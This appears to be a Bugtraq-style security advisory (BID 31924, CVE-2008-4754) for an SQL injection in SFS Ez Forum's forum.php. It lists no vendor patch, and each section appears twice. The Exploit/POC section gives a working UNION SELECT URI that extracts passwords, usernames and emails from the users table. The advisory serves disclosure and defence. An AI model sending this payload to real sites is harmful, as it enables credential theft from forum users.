SFS Ez Forum 'forum.php' SQL Injection Vulnerability
BID:31924
Info
SFS Ez Forum 'forum.php' SQL Injection Vulnerability
| Bugtraq ID: | 31924 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-4754 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 26 2008 12:00AM |
| Updated: | Apr 16 2015 05:52PM |
| Credit: | Hurley |
| Vulnerable: |
Scripts for Sites Ez Forum 0 |
| Not Vulnerable: | |
Discussion
SFS Ez Forum 'forum.php' SQL Injection Vulnerability
SFS Ez Forum is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SFS Ez Forum is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
SFS Ez Forum 'forum.php' SQL Injection Vulnerability
An attacker can exploit this issue with a browser.
The following example URI is available:
http://www.example.com/forum.php?forum=-9999+union+all+select+null,concat_ws(0x3a,password,username,%20email),null,null+from+users/*
An attacker can exploit this issue with a browser.
The following example URI is available:
http://www.example.com/forum.php?forum=-9999+union+all+select+null,concat_ws(0x3a,password,username,%20email),null,null+from+users/*
Solution / Fix
SFS Ez Forum 'forum.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].